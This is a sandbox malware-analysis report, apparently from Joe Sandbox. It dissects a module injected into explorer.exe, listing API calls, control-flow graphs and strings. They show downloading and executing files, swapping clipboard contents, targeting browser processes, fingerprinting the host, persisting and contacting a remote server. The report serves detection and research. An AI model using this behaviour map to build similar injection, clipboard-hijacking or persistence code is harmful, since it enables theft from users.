                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 4277384649-109466966
                                                                                                                                                                                                                          • Opcode ID: ac0048a8c1b97b5be37f734cf37a3f7532f8c13e2c97d188fb481249bfdad725
                                                                                                                                                                                                                          • Instruction ID: b6bff1fc7d45ea42f6e0bece2a1d691275e1fb91dca6a0cec82c1b10400e8bca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac0048a8c1b97b5be37f734cf37a3f7532f8c13e2c97d188fb481249bfdad725
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AF1D431310BC5CADB309F25E8443EA77A1F788B89F449626CA4E97B65DF7AC544C740

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32 ref: 0E8C5282
                                                                                                                                                                                                                          • InternetCrackUrlA.WININET ref: 0E8C5297
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcpyA.KERNEL32 ref: 0E8B731E
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B732F
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7343
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7357
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7368
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B737C
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B739A
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: wsprintfA.USER32 ref: 0E8B73B2
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B73C6
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B73DA
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7416
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: WSAStartup.WS2_32 ref: 0E8B7426
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: socket.WS2_32 ref: 0E8B7442
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: gethostbyname.WS2_32 ref: 0E8B7459
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: memcpy.MSVCRT ref: 0E8B7479
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: htons.WS2_32 ref: 0E8B7488
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: connect.WS2_32 ref: 0E8B749F
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrlenA.KERNEL32 ref: 0E8B74B5
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: send.WS2_32 ref: 0E8B74CB
                                                                                                                                                                                                                          • PathFindFileNameW.SHLWAPI ref: 0E8C531C
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32 ref: 0E8C5336
                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32 ref: 0E8C534C
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8C535C
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8C5368
                                                                                                                                                                                                                          • CreateFileW.KERNEL32 ref: 0E8C5391
                                                                                                                                                                                                                          • WriteFile.KERNEL32 ref: 0E8C53B6
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8C53C5
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8C53CE
                                                                                                                                                                                                                          • ShellExecuteW.SHELL32 ref: 0E8C53FC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8C540B
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8C5416
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                          • String ID: B8IH$open
                                                                                                                                                                                                                          • API String ID: 3619236930-2402625326
                                                                                                                                                                                                                          • Opcode ID: 7ad832edc24f0e499001a067034fa4c443532b192f0a6fea87c3cbcc4a0b7810
                                                                                                                                                                                                                          • Instruction ID: 1373355e1431d346519ae234ccd0a5b6ab436c11d6248a24f521029830d14491
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ad832edc24f0e499001a067034fa4c443532b192f0a6fea87c3cbcc4a0b7810
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27518072714A808AFB10CF66ED543AE77A0F789B88F448825DE4E97B68DF78C545CB40

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32 ref: 0E8C5629
                                                                                                                                                                                                                          • GetComputerNameW.KERNEL32 ref: 0E8C5643
                                                                                                                                                                                                                            • Part of subcall function 0E8BF480: WideCharToMultiByte.KERNEL32 ref: 0E8BF4C3
                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32 ref: 0E8C566C
                                                                                                                                                                                                                          • GetVersionExA.KERNEL32 ref: 0E8C567D
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 0E8C56CD
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: EnterCriticalSection.KERNEL32 ref: 0E8B9498
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: RtlInitializeCriticalSection.NTDLL ref: 0E8B94A5
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94DA
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94FD
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B950D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B951D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: LeaveCriticalSection.KERNEL32 ref: 0E8B95A4
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: memcpy.MSVCRT ref: 0E8B95BC
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrlenA.KERNEL32 ref: 0E8B95CA
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8C56E1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                          • String ID: 2.1$B8IH
                                                                                                                                                                                                                          • API String ID: 2800961625-2388526469
                                                                                                                                                                                                                          • Opcode ID: 548dfce6f61ac98489f05572c49c3bf2591e801de7b04bdd32ccd213bb45216d
                                                                                                                                                                                                                          • Instruction ID: e14ac091475d059a321301b67e7c7df505886899087f8f074bf32429578130e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 548dfce6f61ac98489f05572c49c3bf2591e801de7b04bdd32ccd213bb45216d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94418032714AC0CAEB20DF65E8543DEB7A4F788788F808415EA4D97B58EF78C645CB41

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 3234909527-109466966
                                                                                                                                                                                                                          • Opcode ID: 8feb2644561010b961152437857cd8564b3064406f8d9a6e20686534e0cc2a88
                                                                                                                                                                                                                          • Instruction ID: 232c43aee23c69a765c90bd0576b94444a0cecf9fd2376cd567b0871b0dbcf37
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8feb2644561010b961152437857cd8564b3064406f8d9a6e20686534e0cc2a88
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43318431205A80C7EF24CF25E454359B3A5F789B98F488A25DA9D87798DF38C945CF42
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual$InfoSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2622297391-0
                                                                                                                                                                                                                          • Opcode ID: 9376aa2f0c253af331e9382ad1490ff95537631666a6fae9671663dacc052423
                                                                                                                                                                                                                          • Instruction ID: 8fe9362383503291a4c4567b251cf388433fd93d95472b049527ac3405c588b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9376aa2f0c253af331e9382ad1490ff95537631666a6fae9671663dacc052423
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48318331706B4485EF118F16E42039A76A1F789FD4F088636DE5D9BB58EF3EC8418B40

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                          • String ID: B8IH$brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 936357808-156683969
                                                                                                                                                                                                                          • Opcode ID: ca7cf2f7333e9c74630c9c8955ded9afe126b29924dd5ef945dd6746575d4bbb
                                                                                                                                                                                                                          • Instruction ID: 03b7f13c33ee138071c8650d4b274859c8d52e1083f48ef7662f208fe31e3c6a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca7cf2f7333e9c74630c9c8955ded9afe126b29924dd5ef945dd6746575d4bbb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC418F20210A8182EB54EF75FC503AA63E4FB86784F84AC6AC94ED7368EF7DC544C752

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8BF040: GetWindowsDirectoryW.KERNEL32 ref: 0E8BF093
                                                                                                                                                                                                                            • Part of subcall function 0E8BF040: GetVolumeInformationW.KERNEL32 ref: 0E8BF0E2
                                                                                                                                                                                                                            • Part of subcall function 0E8BF040: wsprintfW.USER32 ref: 0E8BF144
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32 ref: 0E8BF1D5
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8BF1E5
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8BF1F3
                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32 ref: 0E8BF1FE
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32 ref: 0E8BF20C
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8BF21C
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8BF22A
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8BF23A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe$B8IH
                                                                                                                                                                                                                          • API String ID: 1846285901-961851852
                                                                                                                                                                                                                          • Opcode ID: 9ec7a06dd3bee4f417e31b6d81151dd5dc19d44b86899af2f6cd87a0b36f0899
                                                                                                                                                                                                                          • Instruction ID: a1e893c7a4240635dd57c439305020337fa5722d13ad3fd57cc82bc14255d886
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ec7a06dd3bee4f417e31b6d81151dd5dc19d44b86899af2f6cd87a0b36f0899
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66213332318B8286EB40DF65F85832D33A1F789784F41A835DA9EA7714EEB8C509CB40

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8C7AF0: OpenClipboard.USER32 ref: 0E8C7B01
                                                                                                                                                                                                                            • Part of subcall function 0E8C7AF0: GetClipboardData.USER32 ref: 0E8C7B13
                                                                                                                                                                                                                            • Part of subcall function 0E8C7AF0: GlobalLock.KERNEL32 ref: 0E8C7B24
                                                                                                                                                                                                                            • Part of subcall function 0E8C7AF0: GlobalUnlock.KERNEL32 ref: 0E8C7B35
                                                                                                                                                                                                                            • Part of subcall function 0E8C7AF0: CloseClipboard.USER32 ref: 0E8C7B3B
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: GlobalAlloc.KERNEL32 ref: 0E8C7D08
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: GlobalLock.KERNEL32 ref: 0E8C7D1F
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: GlobalUnlock.KERNEL32 ref: 0E8C7D37
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: OpenClipboard.USER32 ref: 0E8C7D3F
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: EmptyClipboard.USER32 ref: 0E8C7D45
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: SetClipboardData.USER32 ref: 0E8C7D53
                                                                                                                                                                                                                            • Part of subcall function 0E8C7CE0: CloseClipboard.USER32 ref: 0E8C7D59
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 0E8C7AA0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 776 e8bf2e0-e8bf321 CreateFileW 777 e8bf323-e8bf32f 776->777 778 e8bf330-e8bf370 GetFileSize call e8e0058 HeapAlloc 776->778 781 e8bf372-e8bf38d ReadFile 778->781 782 e8bf3b0-e8bf3b8 call e8e0040 778->782 784 e8bf399-e8bf3ad call e8e0058 HeapFree 781->784 785 e8bf38f-e8bf397 781->785 790 e8bf45c-e8bf478 782->790 784->782 785->784 787 e8bf3bd-e8bf3df 785->787 791 e8bf44b-e8bf459 call e8e0040 787->791 792 e8bf3e1-e8bf3f6 call e8beee0 787->792 791->790 797 e8bf3f8-e8bf3fd 792->797 798 e8bf401-e8bf42e call e8e0058 HeapAlloc 792->798 797->792 799 e8bf3ff 797->799 798->791 802 e8bf430-e8bf447 call e8ccf80 798->802 799->791 802->791
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 826 e8c50d0-e8c514a lstrcpyA call e8b9450 830 e8c514c-e8c515e call e8f07f0 826->830 831 e8c51c7-e8c51db free call e8f0868 SleepEx 826->831 836 e8c5170-e8c5197 StrChrA call e8f07f8 830->836 837 e8c5160-e8c5165 call e8c5570 830->837 842 e8c5199-e8c519c 836->842 843 e8c51a0-e8c51a3 836->843 837->831 842->843 844 e8c51a5-e8c51bd call e8f0808 call e8c5450 843->844 845 e8c51c2-e8c51c5 843->845 844->845 845->831 845->836
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32 ref: 0E8C512F
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: EnterCriticalSection.KERNEL32 ref: 0E8B9498
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: RtlInitializeCriticalSection.NTDLL ref: 0E8B94A5
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94DA
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94FD
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B950D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B951D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: LeaveCriticalSection.KERNEL32 ref: 0E8B95A4
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: memcpy.MSVCRT ref: 0E8B95BC
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrlenA.KERNEL32 ref: 0E8B95CA
                                                                                                                                                                                                                          • lstrcmp.KERNEL32 ref: 0E8C5156
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8C51CA
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 0E8C51D5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                          • String ID: B8IH

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu$:$B8IH

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu$:\$B8IH

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: lstrlenA.KERNEL32 ref: 0E8C5282
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: InternetCrackUrlA.WININET ref: 0E8C5297
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: PathFindFileNameW.SHLWAPI ref: 0E8C531C
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: GetTempPathW.KERNEL32 ref: 0E8C5336
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: GetTempFileNameW.KERNEL32 ref: 0E8C534C
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: lstrcatW.KERNEL32 ref: 0E8C535C
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: lstrcatW.KERNEL32 ref: 0E8C5368
                                                                                                                                                                                                                            • Part of subcall function 0E8C51E0: CreateFileW.KERNEL32 ref: 0E8C5391
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: SHGetFolderPathW.SHELL32 ref: 0E8BF1D5
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: lstrcatW.KERNEL32 ref: 0E8BF1E5
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: lstrcatW.KERNEL32 ref: 0E8BF1F3
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: CreateDirectoryW.KERNEL32 ref: 0E8BF1FE
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: SetFileAttributesW.KERNEL32 ref: 0E8BF20C
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: lstrcatW.KERNEL32 ref: 0E8BF21C
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: lstrcatW.KERNEL32 ref: 0E8BF22A
                                                                                                                                                                                                                            • Part of subcall function 0E8BF170: lstrcatW.KERNEL32 ref: 0E8BF23A
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32 ref: 0E8C54E5
                                                                                                                                                                                                                          • CopyFileW.KERNEL32 ref: 0E8C54FB
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32 ref: 0E8C550C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filelstrcat$Path$AttributesCreateNameTemp$CopyCrackDeleteDirectoryFindFolderInternetlstrlen
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 3447680573-109466966
                                                                                                                                                                                                                          • Opcode ID: 7f49b66afa7c0b190dc72cc57ffd92d7ba36ceae248c7b52d8005671203e4e27
                                                                                                                                                                                                                          • Instruction ID: cd588245d8f641d60b73c0564675ef453444f534d8d2779252d73169b9653377
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f49b66afa7c0b190dc72cc57ffd92d7ba36ceae248c7b52d8005671203e4e27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58214122324AC596DF30DF65E8A876BA361FB89748FC09415C64D8B958EF3CD605CB05

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 939 e8b8fe0-e8b8fed 940 e8b904f-e8b9054 939->940 941 e8b8fef-e8b8ff9 939->941 942 e8b8ffb 941->942 943 e8b9038-e8b904a HeapFree 941->943 944 e8b9000-e8b9018 OpenThread 942->944 943->940 945 e8b901a-e8b9026 ResumeThread call e8e0040 944->945 946 e8b902c-e8b9031 944->946 945->946 946->944 948 e8b9033 946->948 948->943
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 993137029-0
                                                                                                                                                                                                                          • Opcode ID: 350b1093ccfd2c3c2c73eb94d1ee066efdd318783ec75fd0ecdc008773dfeb84
                                                                                                                                                                                                                          • Instruction ID: 5f088d8d991364b511fbed127221b5dd588ef4080efd8744e759864098d47163
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 350b1093ccfd2c3c2c73eb94d1ee066efdd318783ec75fd0ecdc008773dfeb84
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B016D36A15A80C2EB048F62E49435D7371FB88B84F088425DB0A57B54CF39C452CB00
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2372642624-0
                                                                                                                                                                                                                          • Opcode ID: 58190a93ded2dde5e8871cad741f0538f53c091da1e701dab678116d39fd0d8f
                                                                                                                                                                                                                          • Instruction ID: 202eaffbbc941a48f4a361918ecf68bb59b3920afa274a84b0e6dbb4e70b9011
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58190a93ded2dde5e8871cad741f0538f53c091da1e701dab678116d39fd0d8f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01E08C60A11B8083EF2917B1A88A3791391AB5DB01F445C28C80EA9390EE7CCADA8308
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual$CacheFlushInstruction
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 882653843-0
                                                                                                                                                                                                                          • Opcode ID: 75f636435a0f4809db09609f496f6760a96ec8b1148eb731a98781e445c4eafc
                                                                                                                                                                                                                          • Instruction ID: 609e7a8e85ecbe8b82adaafab7334ff83de8c58b7ce29590097cb6930848c9b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75f636435a0f4809db09609f496f6760a96ec8b1148eb731a98781e445c4eafc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6731E1A32086C087C7198F36E5013AD7B60F349F88F088216EF988B79ACB2CC851C758
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8B88B0: GetCurrentProcessId.KERNEL32 ref: 0E8B890B
                                                                                                                                                                                                                            • Part of subcall function 0E8B88B0: GetCurrentThreadId.KERNEL32 ref: 0E8B8917
                                                                                                                                                                                                                            • Part of subcall function 0E8B88B0: HeapAlloc.KERNEL32 ref: 0E8B8941
                                                                                                                                                                                                                            • Part of subcall function 0E8B88B0: Thread32Next.KERNEL32 ref: 0E8B89A0
                                                                                                                                                                                                                            • Part of subcall function 0E8B88B0: CloseHandle.KERNEL32 ref: 0E8B89B0
                                                                                                                                                                                                                          • OpenThread.KERNEL32 ref: 0E8B8AEE
